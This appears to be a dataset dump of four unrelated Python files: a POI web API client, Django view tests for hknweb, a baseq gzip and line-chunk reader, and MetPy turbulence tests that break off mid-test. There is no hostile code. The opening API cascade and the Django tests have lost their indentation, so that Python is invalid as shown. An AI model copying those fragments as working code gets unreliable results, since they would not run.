if not isinstance(lat, str):
lat = str(lat)
if not isinstance(lon, str):
lon = str(lon)
if cat is not None:
if not isinstance(cat, str):
cat = str(cat)
if conc is not None:
if not isinstance(conc, str):
conc = str(conc)
if not isinstance(dist, str):
dist = str(dist)
if num_poi is not None:
if not isinstance(num_poi, str):
num_poi = str(num_poi)
if order is not None:
if not isinstance(order, str):
order = str(order)
if cat and conc and num_poi and order:
url = self.address + "dist?lat="+lat+"&lon="+lon+"&numpoi="+num_poi+"&order="+order+"&cat="+cat+"&conc="+conc+"&dist="+dist+"&key="+self.key
elif cat and num_poi and order:
url = self.address + "dist?lat="+lat+"&lon="+lon+"&numpoi="+num_poi+"&order="+order+"&cat="+cat+"&dist="+dist+"&key="+self.key
elif cat and num_poi:
url = self.address + "dist?lat="+lat+"&lon="+lon+"&numpoi="+num_poi+"&cat="+cat+"&dist="+dist+"&key="+self.key
elif cat and order:
url = self.address + "dist?lat="+lat+"&lon="+lon+"&order="+order+"&cat="+cat+"&dist="+dist+"&key="+self.key
elif cat and conc:
url = self.address + "dist?lat="+lat+"&lon="+lon+"&cat="+cat+"&conc="+conc+"&dist="+dist+"&key="+self.key
elif cat:
url = self.address + "dist?lat="+lat+"&lon="+lon+"&cat="+cat+"&dist="+dist+"&key="+self.key
elif conc and num_poi and order:
url = self.address + "dist?lat="+lat+"&lon="+lon+"&numpoi="+num_poi+"&order="+order+"&conc="+conc+"&dist="+dist+"&key="+self.key
elif conc and num_poi:
url = self.address + "dist?lat="+lat+"&lon="+lon+"&numpoi="+num_poi+"&conc="+conc+"&dist="+dist+"&key="+self.key
elif conc and order:
url = self.address + "dist?lat="+lat+"&lon="+lon+"&order="+order+"&conc="+conc+"&dist="+dist+"&key="+self.key
elif conc:
url = self.address + "dist?lat="+lat+"&lon="+lon+"&conc="+conc+"&dist="+dist+"&key="+self.key
elif num_poi and order:
url = self.address + "dist?lat="+lat+"&lon="+lon+"&numpoi="+num_poi+"&order="+order+"&dist="+dist+"&key="+self.key
elif num_poi:
url = self.address + "dist?lat="+lat+"&lon="+lon+"&numpoi="+num_poi+"&dist="+dist+"&key="+self.key
elif order:
url = self.address + "dist?lat="+lat+"&lon="+lon+"&order="+order+"&dist="+dist+"&key="+self.key
else:
url = self.address + "dist?lat="+lat+"&lon="+lon+"&dist="+dist+"&key="+self.key
return request(url)
def distance_id(self, poi_id=None, cat=None, conc=None, dist=None, num_poi=None, order=None):
    """Query POIs within ``dist`` of the POI identified by ``poi_id``.

    Builds the ``dist_id`` endpoint URL from the optional filters and
    dispatches it via ``request``.

    Parameters
    ----------
    poi_id : reference POI identifier (required)
    cat : optional category filter
    conc : optional filter (presumably concelho/municipality -- TODO confirm
        against the API documentation)
    dist : search radius (required)
    num_poi : optional maximum number of POIs to return
    order : optional ordering flag for the results

    Returns
    -------
    The ``request(url)`` response, or an error string when a required
    argument is missing.
    """
    if poi_id is None:
        return ("Error, missing ID")
    if dist is None:
        return ("Error, missing distance")
    # str() is a no-op for values that are already strings.
    poi_id = str(poi_id)
    dist = str(dist)
    # Fixed parameter order matches every branch of the original cascade:
    # numpoi, order, cat, conc, then dist and key.
    optional = [
        ("numpoi", num_poi),
        ("order", order),
        ("cat", cat),
        ("conc", conc),
    ]
    # This used to be a 14-branch if/elif cascade that silently dropped
    # `conc` for the (cat, conc, num_poi) and (cat, conc, order)
    # combinations; assembling the query incrementally fixes that.
    # A filter is kept only when truthy after conversion, mirroring the
    # original `if cat and ...` conditions.
    parts = ["{}={}".format(name, str(value))
             for name, value in optional
             if value is not None and str(value)]
    parts.append("dist=" + dist)
    parts.append("key=" + self.key)
    url = self.address + "dist_id?id=" + poi_id + "&" + "&".join(parts)
    return request(url)
def time_coord(self, lat=None, lon=None, cat=None, conc=None, time=None, num_poi=None, order=None):
    """Query POIs reachable within ``time`` from the point (lat, lon).

    Builds the ``poi_time`` endpoint URL from the optional filters and
    dispatches it via ``request``.

    Parameters
    ----------
    lat, lon : coordinates of the reference point (required)
    cat : optional category filter
    conc : optional filter (presumably concelho/municipality -- TODO confirm)
    time : travel-time limit (required)
    num_poi : optional maximum number of POIs to return
    order : optional ordering flag for the results

    Returns
    -------
    The ``request(url)`` response, or an error string when a required
    argument is missing.
    """
    if lat is None or lon is None:
        return ("Error, missing Latitude or Longitude")
    if time is None:
        return ("Error, missing time")
    # str() is a no-op for values that are already strings.
    lat = str(lat)
    lon = str(lon)
    time = str(time)
    # Fixed parameter order matches every branch of the original cascade.
    optional = [
        ("numpoi", num_poi),
        ("order", order),
        ("cat", cat),
        ("conc", conc),
    ]
    # This used to be a 14-branch if/elif cascade that silently dropped
    # `conc` for the (cat, conc, num_poi) and (cat, conc, order)
    # combinations; assembling the query incrementally fixes that.
    parts = ["{}={}".format(name, str(value))
             for name, value in optional
             if value is not None and str(value)]
    parts.append("time=" + time)
    parts.append("key=" + self.key)
    url = self.address + "poi_time?lat=" + lat + "&lon=" + lon + "&" + "&".join(parts)
    return request(url)
def time_id(self, poi_id=None, cat=None, conc=None, time=None, num_poi=None, order=None):
    """Query POIs reachable within ``time`` from the POI ``poi_id``.

    Builds the ``poi_time_id`` endpoint URL from the optional filters and
    dispatches it via ``request``.

    Parameters
    ----------
    poi_id : reference POI identifier (required)
    cat : optional category filter
    conc : optional filter (presumably concelho/municipality -- TODO confirm)
    time : travel-time limit (required)
    num_poi : optional maximum number of POIs to return
    order : optional ordering flag for the results

    Returns
    -------
    The ``request(url)`` response, or an error string when a required
    argument is missing.
    """
    if poi_id is None:
        return ("Error, missing ID")
    if time is None:
        return ("Error, missing time")
    # str() is a no-op for values that are already strings.
    poi_id = str(poi_id)
    time = str(time)
    # Fixed parameter order matches every branch of the original cascade.
    optional = [
        ("numpoi", num_poi),
        ("order", order),
        ("cat", cat),
        ("conc", conc),
    ]
    # This used to be a 14-branch if/elif cascade that silently dropped
    # `conc` for the (cat, conc, num_poi) and (cat, conc, order)
    # combinations; assembling the query incrementally fixes that.
    parts = ["{}={}".format(name, str(value))
             for name, value in optional
             if value is not None and str(value)]
    parts.append("time=" + time)
    parts.append("key=" + self.key)
    url = self.address + "poi_time_id?id=" + poi_id + "&" + "&".join(parts)
    return request(url)
def route_calc(self, poi_id=None, cat=None, conc=None, days=None, duration=None, start_time=None):
    """Request a route calculation starting from the POI ``poi_id``.

    ``days``, ``start_time`` and ``duration`` are required; ``cat`` and
    ``conc`` are optional filters appended to the ``route_calc_id`` query.
    Returns the ``request(url)`` response, or an error string when a
    required argument is missing.
    """
    if poi_id is None:
        return ("Error, missing ID")
    if duration is None:
        return ("Error, missing duration")
    if start_time is None:
        return ("Error, missing start_time")
    if days is None:
        return ("Error, missing days")
    # str() leaves values that are already strings untouched.
    poi_id = str(poi_id)
    days = str(days)
    duration = str(duration)
    start_time = str(start_time)
    if cat is not None:
        cat = str(cat)
    if conc is not None:
        conc = str(conc)
    # Optional filters, in the same cat-then-conc order as before.
    filters = ""
    if cat:
        filters += "&cat=" + cat
    if conc:
        filters += "&conc=" + conc
    url = (self.address + "route_calc_id?id=" + poi_id + filters
           + "&days=" + days + "&start_time=" + start_time
           + "&duration=" + duration + "&key=" + self.key)
    return request(url)
def route_calc_coord(self, lat=None, lon=None, cat=None, conc=None, days=None, duration=None, start_time=None):
    """Request a route calculation starting from the point (lat, lon).

    ``days``, ``start_time`` and ``duration`` are required; ``cat`` and
    ``conc`` are optional filters appended to the ``route_calc_coord``
    query.  Returns the ``request(url)`` response, or an error string
    when a required argument is missing.
    """
    # Fixed: the original tested `lat is None` twice and never checked lon,
    # so a missing longitude produced a URL containing "lon=None".
    if lat is None or lon is None:
        return ("Error, missing coordinates")
    if duration is None:
        return ("Error, missing duration")
    if start_time is None:
        return ("Error, missing start_time")
    if days is None:
        return ("Error, missing days")
    # str() leaves values that are already strings untouched.
    lat = str(lat)
    lon = str(lon)
    days = str(days)
    duration = str(duration)
    start_time = str(start_time)
    # Optional filters, in the same cat-then-conc order as before.
    filters = ""
    if cat is not None and str(cat):
        filters += "&cat=" + str(cat)
    if conc is not None and str(conc):
        filters += "&conc=" + str(conc)
    url = (self.address + "route_calc_coord?lat=" + lat + "&lon=" + lon
           + filters + "&days=" + days + "&start_time=" + start_time
           + "&duration=" + duration + "&key=" + self.key)
    return request(url)
def poi_cat_conc(self, cat=None, conc=None, num_poi=None, min_score=None):
    """List POIs filtered by category and/or concelho.

    At least one of ``cat`` or ``conc`` must be given; ``num_poi`` and
    ``min_score`` further restrict the result set.  Returns the
    ``request(url)`` response, or an error string when both filters are
    missing.

    Fixes in this revision:
    - several branches produced malformed URLs ("poi?&..." with a stray
      '&', and one "poi&cat=..." with no '?' at all);
    - the (cat, conc, num_poi) and (cat, conc, min_score) combinations
      silently dropped the `conc` filter;
    - there was no final else branch, so empty-string cat/conc raised
      UnboundLocalError instead of returning a response.
    """
    if cat is None and conc is None:
        return ("Error, missing category or concelho")
    # A filter is kept only when truthy after str() conversion, mirroring
    # the original branch conditions; str() is a no-op on strings.
    optional = [
        ("cat", cat),
        ("conc", conc),
        ("numpoi", num_poi),
        ("score", min_score),
    ]
    parts = ["{}={}".format(name, str(value))
             for name, value in optional
             if value is not None and str(value)]
    parts.append("key=" + self.key)
    url = self.address + "poi?" + "&".join(parts)
    return request(url)
def poi_by_id(self, poi_id=None):
    """Fetch a single POI record by its identifier via the ``poi_id``
    endpoint; returns an error string when no identifier is given."""
    if poi_id is None:
        return ("Error, missing ID")
    query = "poi_id?id={}&key={}".format(str(poi_id), self.key)
    return request(self.address + query)
def OSRM_poi_to_poi(self, poi_id=None, poi_id2=None, profile="driving"):
    """Request an OSRM route between two POIs via the ``osrm_poipoi``
    endpoint.

    ``profile`` is lower-cased before use (e.g. "driving"); returns an
    error string when either identifier is missing.
    """
    if poi_id is None or poi_id2 is None:
        return ("Error, missing ID")
    profile = profile.lower()
    query = "osrm_poipoi?id={}&id2={}&profile={}&key={}".format(
        str(poi_id), str(poi_id2), profile, self.key)
    return request(self.address + query)
def OSRM_poi_to_coord(self, poi_id=None, lat=None, lon=None, profile="driving", switch=0):
    """Request an OSRM route between a POI and a coordinate.

    ``switch`` selects the direction: 1 uses the ``osrm_poipoint``
    endpoint, anything else uses ``osrm_pointpoi``.  ``profile`` is
    lower-cased before use.  Returns the ``request(url)`` response, or an
    error string when a required argument is missing.
    """
    if poi_id is None:
        return ("Error, missing ID")
    # Fixed: the original tested `lat is None` twice and never checked lon,
    # so a missing longitude produced a URL containing "lon=None".
    if lat is None or lon is None:
        return ("Error, missing coordinates")
    profile = profile.lower()
    endpoint = "osrm_poipoint" if switch == 1 else "osrm_pointpoi"
    url = (self.address + endpoint + "?id=" + str(poi_id)
           + "&lat=" + str(lat) + "&lon=" + str(lon)
           + "&profile=" + profile + "&key=" + self.key)
    return request(url)
def route_by_id(self, route_id=None):
    """Fetch a previously computed route by its identifier via the
    ``route_id`` endpoint; returns an error string when no identifier is
    given."""
    if route_id is None:
        return ("Error, missing ID")
    query = "route_id?id={}&key={}".format(str(route_id), self.key)
    return request(self.address + query)
e46d2de762fb98fbe018c95d26b4a324b2254db0 | 4,364 | py | Python | hknweb/candidate/tests/views/officer_challenge/test_confirm.py | jyxzhang/hknweb | a01ffd8587859bf63c46213be6a0c8b87164a5c2 | [
"MIT"
] | null | null | null | hknweb/candidate/tests/views/officer_challenge/test_confirm.py | jyxzhang/hknweb | a01ffd8587859bf63c46213be6a0c8b87164a5c2 | [
"MIT"
] | null | null | null | hknweb/candidate/tests/views/officer_challenge/test_confirm.py | jyxzhang/hknweb | a01ffd8587859bf63c46213be6a0c8b87164a5c2 | [
"MIT"
] | null | null | null | from django.urls import reverse
from hknweb.candidate.models import OffChallenge
from hknweb.candidate.tests.views.utils import CandidateViewTestsBase
class ChallengeConfirmViewTests(CandidateViewTestsBase):
def test_challenge_confirm_get_returns_200(self):
self.client.login(username=self.officer.username, password=self.password)
oc = OffChallenge.objects.create(
requester=self.candidate,
officer=self.officer,
)
kwargs = {"pk": oc.id}
response = self.client.get(reverse("candidate:challengeconfirm", kwargs=kwargs))
self.client.logout()
self.assertEqual(response.status_code, 200)
def test_challenge_confirm_post_returns_302(self):
self.client.login(username=self.officer.username, password=self.password)
oc = OffChallenge.objects.create(
requester=self.candidate,
officer=self.officer,
)
kwargs = {"pk": oc.id}
data = {"officer_confirmed": True}
response = self.client.post(
reverse("candidate:challengeconfirm", kwargs=kwargs), data=data
)
self.client.logout()
self.assertEqual(response.status_code, 302)
def test_challenge_confirm_same_id_returns_403(self):
self.client.login(username=self.officer2.username, password=self.password)
oc = OffChallenge.objects.create(
requester=self.candidate,
officer=self.officer,
)
kwargs = {"pk": oc.id}
data = {"officer_confirmed": True}
response = self.client.post(
reverse("candidate:challengeconfirm", kwargs=kwargs), data=data
)
self.client.logout()
self.assertEqual(response.status_code, 403)
def test_challenge_confirm_post_confirmed_sends_true_email(self):
self.client.login(username=self.officer.username, password=self.password)
oc = OffChallenge.objects.create(
requester=self.candidate,
officer=self.officer,
)
oc.csec_confirmed = True
oc.save()
kwargs = {"pk": oc.id}
data = {"officer_confirmed": True}
response = self.client.post(
reverse("candidate:challengeconfirm", kwargs=kwargs), data=data
)
self.client.logout()
self.assertEqual(response.status_code, 302)
def test_challenge_confirm_post_not_confirmed_sends_false_email(self):
self.client.login(username=self.officer.username, password=self.password)
oc = OffChallenge.objects.create(
requester=self.candidate,
officer=self.officer,
)
oc.csec_confirmed = True
oc.save()
kwargs = {"pk": oc.id}
data = {"officer_confirmed": False}
response = self.client.post(
reverse("candidate:challengeconfirm", kwargs=kwargs), data=data
)
self.client.logout()
self.assertEqual(response.status_code, 302)
def test_confirm_get_returns_404(self):
self.client.login(username=self.officer.username, password=self.password)
oc = OffChallenge.objects.create(
requester=self.candidate,
officer=self.officer,
)
kwargs = {"id": oc.id}
response = self.client.get(reverse("candidate:confirm", kwargs=kwargs))
self.client.logout()
self.assertEqual(response.status_code, 404)
def test_confirm_post_returns_302(self):
self.client.login(username=self.officer.username, password=self.password)
oc = OffChallenge.objects.create(
requester=self.candidate,
officer=self.officer,
)
kwargs = {"id": oc.id}
response = self.client.post(reverse("candidate:confirm", kwargs=kwargs))
self.client.logout()
self.assertEqual(response.status_code, 302)
def test_officer_review_confirmation_get_returns_200(self):
self.client.login(username=self.officer.username, password=self.password)
oc = OffChallenge.objects.create(
requester=self.candidate,
officer=self.officer,
)
kwargs = {"pk": oc.id}
response = self.client.get(reverse("candidate:reviewconfirm", kwargs=kwargs))
self.client.logout()
self.assertEqual(response.status_code, 200)
| 30.305556 | 88 | 0.645967 | 463 | 4,364 | 5.961123 | 0.12743 | 0.086957 | 0.04058 | 0.055072 | 0.874275 | 0.851449 | 0.838768 | 0.838768 | 0.837681 | 0.837681 | 0 | 0.013082 | 0.246792 | 4,364 | 143 | 89 | 30.517483 | 0.82659 | 0 | 0 | 0.68 | 0 | 0 | 0.062099 | 0.03506 | 0 | 0 | 0 | 0 | 0.08 | 1 | 0.08 | false | 0.08 | 0.03 | 0 | 0.12 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
e46e60d02b3b27f6d8c6c735dd714fabcfce1a06 | 1,895 | py | Python | baseq/utils/file_reader.py | basedata10/baseq | 0f1786c3392a51a6ec7cb0f32355cd28eaa5df29 | [
"MIT"
] | 1 | 2018-08-30T20:29:17.000Z | 2018-08-30T20:29:17.000Z | baseq/utils/file_reader.py | basedata10/baseq | 0f1786c3392a51a6ec7cb0f32355cd28eaa5df29 | [
"MIT"
] | null | null | null | baseq/utils/file_reader.py | basedata10/baseq | 0f1786c3392a51a6ec7cb0f32355cd28eaa5df29 | [
"MIT"
] | null | null | null | import subprocess
def read_file_by_lines(filepath, maxLines, linecount):
    """Yield successive chunks of ``linecount`` lines from a text file.

    Files whose name ends in gz/gzip/gz2 are streamed through an external
    ``gunzip -c`` process and decoded as UTF-8; anything else is opened as
    plain text.  Iteration stops after ``maxLines`` chunks (note: chunks,
    not lines) or at end of file, detected by an empty first line in a
    chunk -- a final, partially filled chunk is still yielded.

    Fixes in this revision: the gz and plain-text loops were duplicated,
    and the file handle was never closed (now closed via try/finally even
    when the generator is abandoned early).

    Parameters
    ----------
    filepath : path to the input file
    maxLines : maximum number of chunks to yield
    linecount : number of lines per yielded chunk
    """
    compressed = filepath.endswith(("gz", "gzip", "gz2"))
    if compressed:
        reading = subprocess.Popen(["gunzip", "-c", filepath],
                                   stdout=subprocess.PIPE, bufsize=1000000)
        infile = reading.stdout
    else:
        infile = open(filepath, 'r')
    try:
        for _ in range(maxLines):
            if compressed:
                data = [infile.readline().decode('utf8') for _ in range(linecount)]
            else:
                data = [infile.readline() for _ in range(linecount)]
            if data[0] == "":
                return
            yield data
    finally:
        infile.close()
def read_filelines(filepath, maxLines, linecount, skip=0):
    """Yield chunks of ``linecount`` lines, discarding the first ``skip``
    chunks of the file.

    Behaves like ``read_file_by_lines`` but skips the first ``skip``
    chunks before yielding, so at most ``maxLines + skip`` chunks are read
    and at most ``maxLines`` are yielded.  Iteration stops at end of file
    (empty first line in a chunk).

    Fixes in this revision: ``skip`` previously had no effect on the data
    -- the skip branch `continue`d *before* reading, so no lines were ever
    discarded and yielding always started at the top of the file.  The
    skipped chunks are now actually read and thrown away.  Also removes
    the duplicated gz/plain loops and closes the file via try/finally.

    Parameters
    ----------
    filepath : path to the input file (gz/gzip/gz2 names are decompressed
        through ``gunzip -c`` and decoded as UTF-8)
    maxLines : maximum number of chunks to yield
    linecount : number of lines per yielded chunk
    skip : number of leading chunks to discard
    """
    compressed = filepath.endswith(("gz", "gzip", "gz2"))
    if compressed:
        reading = subprocess.Popen(["gunzip", "-c", filepath],
                                   stdout=subprocess.PIPE, bufsize=1000000)
        infile = reading.stdout
    else:
        infile = open(filepath, 'r')
    try:
        for index in range(maxLines + skip):
            if compressed:
                data = [infile.readline().decode('utf8') for _ in range(linecount)]
            else:
                data = [infile.readline() for _ in range(linecount)]
            if data[0] == "":
                return
            if index < skip:
                continue  # discard this chunk; it falls inside the skip window
            yield data
    finally:
        infile.close()
900c3fc565499e93ee12bec4bd08db836b9ce151 | 15,099 | py | Python | metpy/calc/tests/test_turbulence.py | jtwhite79/MetPy | 8f1880be1ee98c17cd00ae556324386d2a6301ac | [
"BSD-3-Clause"
] | 3 | 2016-02-25T08:39:32.000Z | 2019-10-24T05:12:55.000Z | metpy/calc/tests/test_turbulence.py | wqshen/MetPy | fe15ec894bf15582576b090457c3000b4afb3555 | [
"BSD-3-Clause"
] | null | null | null | metpy/calc/tests/test_turbulence.py | wqshen/MetPy | fe15ec894bf15582576b090457c3000b4afb3555 | [
"BSD-3-Clause"
] | 2 | 2017-01-06T16:30:40.000Z | 2020-03-25T22:25:01.000Z | # Copyright (c) 2008-2015 MetPy Developers.
# Distributed under the terms of the BSD 3-Clause License.
# SPDX-License-Identifier: BSD-3-Clause
import numpy as np
from numpy.testing import assert_array_equal, assert_almost_equal
from metpy.calc.turbulence import * # noqa
class TestTurbulenceKineticEnergy(object):
    """Tests for turbulence kinetic energy (``tke``)."""

    def get_uvw_and_known_tke(self):
        """Return zero-mean u, v, w series and their known tke."""
        u = np.array([-2, -1, 0, 1, 2])
        v = -u
        w = 2 * u
        # tke = 0.5 * sqrt(mean(u'^2) + mean(v'^2) + mean(w'^2))
        #     = 0.5 * sqrt(2 + 2 + 8)
        e_true = np.sqrt(12) / 2.
        return u, v, w, e_true

    def test_no_tke_1d(self):
        # Constant series carry no turbulent fluctuations.
        u, v, w = (np.ones(5) for _ in range(3))
        assert_array_equal(0, tke(u, v, w))

    def test_no_tke_2d_axis_last(self):
        # Shape (instruments, observations); constant input -> zero tke.
        u, v, w = (np.ones((2, 5)) for _ in range(3))
        assert_array_equal(np.zeros(2), tke(u, v, w, axis=-1))

    def test_no_tke_2d_axis_first(self):
        # Shape (observations, instruments); constant input -> zero tke.
        u, v, w = (np.ones((5, 2)) for _ in range(3))
        assert_array_equal(np.zeros(2), tke(u, v, w, axis=0))

    def test_known_tke(self):
        u, v, w, e_true = self.get_uvw_and_known_tke()
        assert_array_equal(e_true, tke(u, v, w))

    def test_known_tke_2d_axis_last(self):
        """Array shaped (3, 5): the time axis is the last one."""
        u, v, w, e_true = self.get_uvw_and_known_tke()
        u, v, w = (np.tile(ts, (3, 1)) for ts in (u, v, w))
        assert_array_equal(e_true * np.ones(3), tke(u, v, w, axis=-1))

    def test_known_tke_2d_axis_first(self):
        """Array shaped (5, 3): the time axis is the first one."""
        u, v, w, e_true = self.get_uvw_and_known_tke()
        u, v, w = (np.tile(ts, (3, 1)).transpose() for ts in (u, v, w))
        expected = e_true * np.ones(3).transpose()
        assert_array_equal(expected, tke(u, v, w, axis=0))
        # Zero-mean input: the perturbation path must agree.
        assert_array_equal(expected, tke(u, v, w, axis=0, perturbation=True))
class TestGetPerturbation(object):
    """Tests for ``get_perturbation`` (departure from the time mean)."""

    def get_pert_from_zero_mean(self):
        """Zero-mean series: the perturbation equals the series itself."""
        ts = np.array([-2, -1, 0, 1, 2])
        return ts, ts.copy()

    def get_pert_from_non_zero_mean(self):
        """Series with mean 2: the perturbation is the series minus 2."""
        ts = np.array([-2, 0, 2, 4, 6])
        return ts, np.array([-4, -2, 0, 2, 4])

    def test_no_perturbation_1d(self):
        # A constant series has no departures from its mean.
        assert_array_equal(0, get_perturbation(np.ones(5)))

    def test_no_perturbation_2d_axis_last(self):
        # Shape (instruments, observations); constant input -> zeros.
        assert_array_equal(np.zeros((2, 5)),
                           get_perturbation(np.ones((2, 5)), axis=-1))

    def test_no_tke_2d_axis_first(self):
        # Shape (observations, instruments); constant input -> zeros.
        # NOTE(review): the name says "tke" but this tests get_perturbation;
        # kept as-is so test discovery is unchanged.
        assert_array_equal(np.zeros((5, 2)),
                           get_perturbation(np.ones((5, 2)), axis=0))

    def test_known_perturbation_zero_mean_1d(self):
        ts, expected = self.get_pert_from_zero_mean()
        assert_array_equal(expected, get_perturbation(ts))

    def test_known_perturbation_zero_mean_2d_axis_last(self):
        ts, expected = self.get_pert_from_zero_mean()
        assert_array_equal(np.tile(expected, (3, 1)),
                           get_perturbation(np.tile(ts, (3, 1)), axis=-1))

    def test_known_perturbation_zero_mean_2d_axis_first(self):
        ts, expected = self.get_pert_from_zero_mean()
        assert_array_equal(np.tile(expected, (3, 1)).transpose(),
                           get_perturbation(np.tile(ts, (3, 1)).transpose(), axis=0))

    def test_known_perturbation_non_zero_mean_1d(self):
        ts, expected = self.get_pert_from_non_zero_mean()
        assert_array_equal(expected, get_perturbation(ts))

    def test_known_perturbation_non_zero_mean_2d_axis_last(self):
        ts, expected = self.get_pert_from_non_zero_mean()
        assert_array_equal(np.tile(expected, (3, 1)),
                           get_perturbation(np.tile(ts, (3, 1)), axis=-1))

    def test_known_perturbation_non_zero_mean_2d_axis_first(self):
        ts, expected = self.get_pert_from_non_zero_mean()
        assert_array_equal(np.tile(expected, (3, 1)).transpose(),
                           get_perturbation(np.tile(ts, (3, 1)).transpose(), axis=0))
class TestKinematicFlux(object):
    """Tests for ``kinematic_flux`` (mean product of two perturbation
    series, e.g. u'w') in 1-D and along either axis of 2-D input."""

    def get_uvw_and_known_kf_zero_mean(self):
        """Return zero-mean u, v, w series and their known fluxes."""
        u = np.array([-2, -1, 0, 1, 2])
        v = -u
        w = 2 * u
        # e.g. uw: mean(u * 2u) = mean(2u^2) = 2 * mean([4,1,0,1,4]) = 4
        kf_true = {'uv': -2, 'uw': 4, 'vw': -4}
        return u, v, w, kf_true

    def get_uvw_and_known_kf_non_zero_mean(self):
        """Return non-zero-mean u, v, w series and their known fluxes."""
        u = np.array([-2, -1, 0, 1, 5])
        v = -u
        w = 2 * u
        kf_true = {'uv': -5.84, 'uw': 11.68, 'vw': -11.68}
        return u, v, w, kf_true

    def test_kf_1d(self):
        """1-D input, both with and without the perturbation shortcut."""
        u, v, w, kf_true = self.get_uvw_and_known_kf_zero_mean()
        assert_array_equal(kinematic_flux(u, v, perturbation=False),
                           kf_true['uv'])
        assert_array_equal(kinematic_flux(u, w, perturbation=False),
                           kf_true['uw'])
        assert_array_equal(kinematic_flux(v, w, perturbation=False),
                           kf_true['vw'])
        # given u, v, and w have a zero mean, the kf computed with
        # perturbation=True and perturbation=False should be the same
        assert_array_equal(kinematic_flux(u, v, perturbation=False),
                           kinematic_flux(u, v, perturbation=True))
        assert_array_equal(kinematic_flux(u, w, perturbation=False),
                           kinematic_flux(u, w, perturbation=True))
        assert_array_equal(kinematic_flux(v, w, perturbation=False),
                           kinematic_flux(v, w, perturbation=True))
        # now use a non-zero mean
        u, v, w, kf_true = self.get_uvw_and_known_kf_non_zero_mean()
        assert_array_equal(kinematic_flux(u, v, perturbation=False),
                           kf_true['uv'])
        assert_array_equal(kinematic_flux(u, w, perturbation=False),
                           kf_true['uw'])
        assert_array_equal(kinematic_flux(v, w, perturbation=False),
                           kf_true['vw'])

    def test_kf_2d_axis_last(self):
        """2-D input shaped (3, 5): the time axis is the last one."""
        u, v, w, kf_true = self.get_uvw_and_known_kf_zero_mean()
        u = np.array([u, u, u])
        v = np.array([v, v, v])
        w = np.array([w, w, w])
        # replicate the expected scalars across the three rows in place
        for key in kf_true.keys():
            tmp = kf_true[key]
            kf_true[key] = np.array([tmp, tmp, tmp])
        assert_array_equal(kinematic_flux(u, v, perturbation=False, axis=-1),
                           kf_true['uv'])
        assert_array_equal(kinematic_flux(u, w, perturbation=False, axis=-1),
                           kf_true['uw'])
        assert_array_equal(kinematic_flux(v, w, perturbation=False, axis=-1),
                           kf_true['vw'])
        # given u, v, and w have a zero mean, the kf computed with
        # perturbation=True and perturbation=False should be the same
        assert_array_equal(kinematic_flux(u, v, perturbation=False, axis=-1),
                           kinematic_flux(u, v, perturbation=True, axis=-1))
        assert_array_equal(kinematic_flux(u, w, perturbation=False, axis=-1),
                           kinematic_flux(u, w, perturbation=True, axis=-1))
        assert_array_equal(kinematic_flux(v, w, perturbation=False, axis=-1),
                           kinematic_flux(v, w, perturbation=True, axis=-1))
        # now use a non-zero mean
        u, v, w, kf_true = self.get_uvw_and_known_kf_non_zero_mean()
        u = np.array([u, u, u])
        v = np.array([v, v, v])
        w = np.array([w, w, w])
        for key in kf_true.keys():
            tmp = kf_true[key]
            kf_true[key] = np.array([tmp, tmp, tmp])
        assert_array_equal(kinematic_flux(u, v, perturbation=False, axis=-1),
                           kf_true['uv'])
        assert_array_equal(kinematic_flux(u, w, perturbation=False, axis=-1),
                           kf_true['uw'])
        assert_array_equal(kinematic_flux(v, w, perturbation=False, axis=-1),
                           kf_true['vw'])

    def test_kf_2d_axis_first(self):
        """2-D input shaped (5, 3): the time axis is the first one."""
        u, v, w, kf_true = self.get_uvw_and_known_kf_zero_mean()
        u = np.array([u, u, u]).transpose()
        v = np.array([v, v, v]).transpose()
        w = np.array([w, w, w]).transpose()
        # replicate the expected scalars across the three columns in place
        for key in kf_true.keys():
            tmp = kf_true[key]
            kf_true[key] = np.array([tmp, tmp, tmp]).transpose()
        assert_array_equal(kinematic_flux(u, v, perturbation=False, axis=0),
                           kf_true['uv'])
        assert_array_equal(kinematic_flux(u, w, perturbation=False, axis=0),
                           kf_true['uw'])
        assert_array_equal(kinematic_flux(v, w, perturbation=False, axis=0),
                           kf_true['vw'])
        # given u, v, and w have a zero mean, the kf computed with
        # perturbation=True and perturbation=False should be the same
        assert_array_equal(kinematic_flux(u, v, perturbation=False, axis=0),
                           kinematic_flux(u, v, perturbation=True, axis=0))
        assert_array_equal(kinematic_flux(u, w, perturbation=False, axis=0),
                           kinematic_flux(u, w, perturbation=True, axis=0))
        assert_array_equal(kinematic_flux(v, w, perturbation=False, axis=0),
                           kinematic_flux(v, w, perturbation=True, axis=0))
        # now use a non-zero mean
        u, v, w, kf_true = self.get_uvw_and_known_kf_non_zero_mean()
        u = np.array([u, u, u]).transpose()
        v = np.array([v, v, v]).transpose()
        w = np.array([w, w, w]).transpose()
        for key in kf_true.keys():
            tmp = kf_true[key]
            kf_true[key] = np.array([tmp, tmp, tmp]).transpose()
        assert_array_equal(kinematic_flux(u, v, perturbation=False, axis=0),
                           kf_true['uv'])
        assert_array_equal(kinematic_flux(u, w, perturbation=False, axis=0),
                           kf_true['uw'])
        assert_array_equal(kinematic_flux(v, w, perturbation=False, axis=0),
                           kf_true['vw'])
class TestFrictionVelocity(object):
    """Tests for ``friction_velocity`` (u*), both from u'w' alone and
    from the combined u'w'/v'w' form when v is supplied."""

    def get_uvw_and_known_u_star_zero_mean(self):
        """Return zero-mean u, v, w series and their known u* values."""
        u = np.array([-2, -1, 0, 1, 2])
        v = -u
        w = 2 * u
        # 'uw' uses only the u'w' flux; 'uwvw' includes v'w' as well
        u_star_true = {'uw': 2.0, 'uwvw': 2.3784142300054421}
        return u, v, w, u_star_true

    def get_uvw_and_known_u_star_non_zero_mean(self):
        """Return non-zero-mean u, v, w series and their known u* values."""
        u = np.array([-2, -1, 0, 1, 5])
        v = -u
        w = 2 * u
        u_star_true = {'uw': 3.4176014981270124, 'uwvw': 4.0642360178166017}
        return u, v, w, u_star_true

    def test_u_star_1d(self):
        """1-D input, with and without the spanwise component v."""
        u, v, w, u_star_true = self.get_uvw_and_known_u_star_zero_mean()
        assert_almost_equal(friction_velocity(u, w, perturbation=False),
                            u_star_true['uw'])
        assert_almost_equal(friction_velocity(u, w, v=v, perturbation=False),
                            u_star_true['uwvw'])
        # now use a non-zero mean
